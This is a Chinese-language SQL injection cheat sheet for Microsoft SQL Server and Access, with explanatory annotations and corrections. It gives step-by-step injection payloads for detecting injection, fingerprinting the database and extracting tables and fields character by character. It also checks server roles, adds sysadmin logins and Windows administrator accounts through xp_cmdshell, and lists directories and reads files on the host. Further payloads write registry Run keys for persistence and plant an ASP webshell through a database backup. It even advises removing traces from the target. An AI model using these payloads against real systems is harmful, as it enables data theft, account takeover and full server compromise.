1.判断是否有注入：;and 1=1 与 ;and 1=2 （两次返回页面不同，说明参数被直接拼进了 SQL 语句）
2.初步判断是否是 mssql：;and user>0 （user 是 T-SQL 中返回当前数据库用户名的函数，与整数比较会触发类型转换错误，并把用户名带进报错信息；此法依赖页面回显数据库错误，错误被屏蔽时看不到结果）
3.注入参数是字符型：'and [查询条件] and ''=' （末尾的 ''=' 用来闭合原语句中的单引号，使整条语句语法仍然成立）
4.搜索时没过滤参数的：'and [查询条件] and '%25'=' （%25 是 URL 编码后的 %，用于闭合 like '%关键字%' 这类模糊查询中的引号和通配符）
5.判断数据库系统

;and (select count(*) from sysobjects)>0     mssql（sysobjects 是 SQL Server 的系统表）

;and (select count(*) from msysobjects)>0    access（MSysObjects 是 Access/Jet 的系统表；默认通常没有读权限，查询可能因权限不足而报错，这种报错本身也能说明后端是 Access）
6.猜数据库 ;and (select Count(*) from [数据库名])>0 （这里的"数据库名"实际是要猜的表名：表存在且有记录时条件为真，表不存在则语句报错或页面异常）
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 （同上，"数据库名"指表名；字段不存在时语句报错）
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 （把 >0 依次换成 >1、>2… 或做二分比较即可确定长度；top 1 在没有 order by 时取到的是任意一行，需要定位具体记录时应加 where 条件）
9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 （asc/mid 是 Access/Jet 的函数；把 mid 的起始位置依次换成 2、3… 并对比较值做二分，即可逐字符还原内容）

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 （unicode/substring 是 T-SQL 函数；unicode() 返回的是 Unicode 码点，对中文等非 ASCII 字符同样适用，纯 ASCII 内容也可用 ascii()）
10.测试权限结构(mssql)

IS_SRVROLEMEMBER 返回 1 表示当前登录属于该固定服务器角色，0 表示不属于，角色名无效时返回 NULL，因此 ;and 1=(...) 只在是成员时为真。

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--   （IS_MEMBER 检查的是当前数据库内的角色成员身份，与上面的服务器级角色不同）
11.添加mssql和系统的帐户 （以下操作基本都需要 sysadmin 权限，sp_addlogin 至少需要 securityadmin；xp_cmdshell 在 SQL Server 2005 及以后默认关闭，需先执行 sp_configure 'show advanced options',1; reconfigure; sp_configure 'xp_cmdshell',1; reconfigure 打开）

;exec master.dbo.sp_addlogin username;--   （也可写成 sp_addlogin username,password 一步设好口令，否则新登录口令为空）
;exec master.dbo.sp_password null,password,username;--   （sp_password 的参数顺序是 旧口令,新口令,登录名；原文写成 null,username,password 会把登录名当成新口令）

;exec master.dbo.sp_addsrvrolemember username,sysadmin;--   （参数顺序是 登录名,角色名，且两个参数之间要用逗号分隔；原文的 sysadmin username 写法无法执行。sp_addlogin / sp_password / sp_addsrvrolemember 在新版本中已被 CREATE LOGIN / ALTER LOGIN / ALTER SERVER ROLE 取代，旧过程随时可能被移除）

;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--   （各个开关之间要有空格，原文 /workstations:*/times:all 连在一起会被 net 命令拒绝）

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录

;create table dirs(paths varchar(100), id int)   （xp_dirtree 默认返回 subdirectory、depth 两列，正好对应这两个字段）

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0   （paths 是字符型，与 0 比较会触发转换错误并在报错信息中带出目录名，属于报错注入，需要页面回显错误）

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0   （原文末尾的 ">)" 是笔误，应为 ">0"；每取到一个目录名就加进 not in 列表，逐个枚举。用完后应 drop table dirs 清理，否则会在目标库中留下明显痕迹）
(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（该过程返回 4 列，与 temp 的 4 个字段一一对应，所以这里不用指定列）

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表（只返回 1 列，所以只能插入 id）

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构（返回 subdirectory、depth 两列）

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（命令输出每行占一条记录；需要 sysadmin 权限且 xp_cmdshell 已被启用）
13.mssql中的存储过程 （xp_reg* 系列扩展过程中，写入和删除类默认只有 sysadmin 能执行；它们直接改动操作系统注册表，例如向 ...\CurrentVersion\Run 写值就是常见的开机自启持久化手法，属于高风险操作）

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种：REG_SZ 表示字符型，REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表

xp_regdeletevalue 根键,子键,值名

;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值

;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值（原文漏了 exec）
14.mssql的backup创建webshell

use model   （model 是新建数据库的模板库，在其中建表后，之后新建的每个库都会自带 cmd 表，痕迹非常明显；换成任意一个有写权限的已有库同样可行）

create table cmd(str image);

insert into cmd(str) values ('');   （'' 处填入 webshell 代码）

backup database model to disk='c:\l.asp';   （需要 BACKUP DATABASE 权限，且 SQL Server 服务账号对目标目录有写权限；目标路径必须是数据库所在主机上的 web 目录或可写的 UNC 路径。生成的文件是二进制备份，webshell 文本夹在其中，ASP 解释器只执行 <% %> 之间的代码，其余字节会当作页面内容输出）
15.mssql内置函数 （下面几条都是用字符与数字比较触发转换错误、靠报错信息"爆"出内容，只有在页面回显数据库错误时才有效）

;and (select @@version)>0 获得版本信息（@@version 返回的是 SQL Server 的版本、补丁级别以及所运行的 Windows 版本，不只是 Windows 版本号）

;and user_name()='dbo' 判断当前连接用户是否映射为 dbo（sa 及 sysadmin 成员在所有库中都映射为 dbo，但该库的所有者也是 dbo，所以条件为真不等于一定是 sa；要确认 sa 可用 system_user='sa'，或用第 10 条的 IS_SRVROLEMEMBER('sysadmin') 直接判断权限）

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell （与第 14 条是同一手法，只是备份到另一个路径；同样要求 SQL Server 服务账号对 g:\wwwtest 有写权限，且该目录是 web 根目录）

use model

create table cmd(str image);

insert into cmd(str) values ('');

backup database model to disk='g:\wwwtest\l.asp';